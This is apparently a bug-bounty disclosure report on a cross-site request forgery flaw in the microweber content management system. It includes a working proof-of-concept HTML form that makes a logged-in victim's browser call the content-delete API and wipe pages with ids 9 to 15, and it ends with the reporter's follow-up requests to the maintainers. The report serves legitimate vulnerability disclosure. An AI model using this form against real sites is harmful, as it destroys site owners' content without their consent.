Cross-Site Request Forgery (CSRF) in microweber/microweber
Valid
Reported on
Jul 30th 2021
✍️ Description
Attacker able to batch delete any Website pages if knows the pages id
parameter value.
🕵️♂️ Proof of Concept
Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the files with id from 9 to 15 have been deleted.
//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
<input type="hidden" name="ids[]" value="on" />
<input type="hidden" name="ids[]" value="9" />
<input type="hidden" name="ids[]" value="10" />
<input type="hidden" name="ids[]" value="11" />
<input type="hidden" name="ids[]" value="12" />
<input type="hidden" name="ids[]" value="13" />
<input type="hidden" name="ids[]" value="14" />
<input type="hidden" name="ids[]" value="15" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
Here a page attacker can delete any file. 📍 Location app.js#L1
Occurrences
We have contacted a member of the
microweber
team and are waiting to hear back
2 years ago
Hey microweber team , can you give some feedbacks to me? thanks so much.
amammad modified the report
2 years ago
Hey microweber team, I just want to sure that you see this important report too.
Dear microweber team, Can I ask you to validate this report too, I think that you forget to check this report.
Best regards, Amammad.
to join this conversation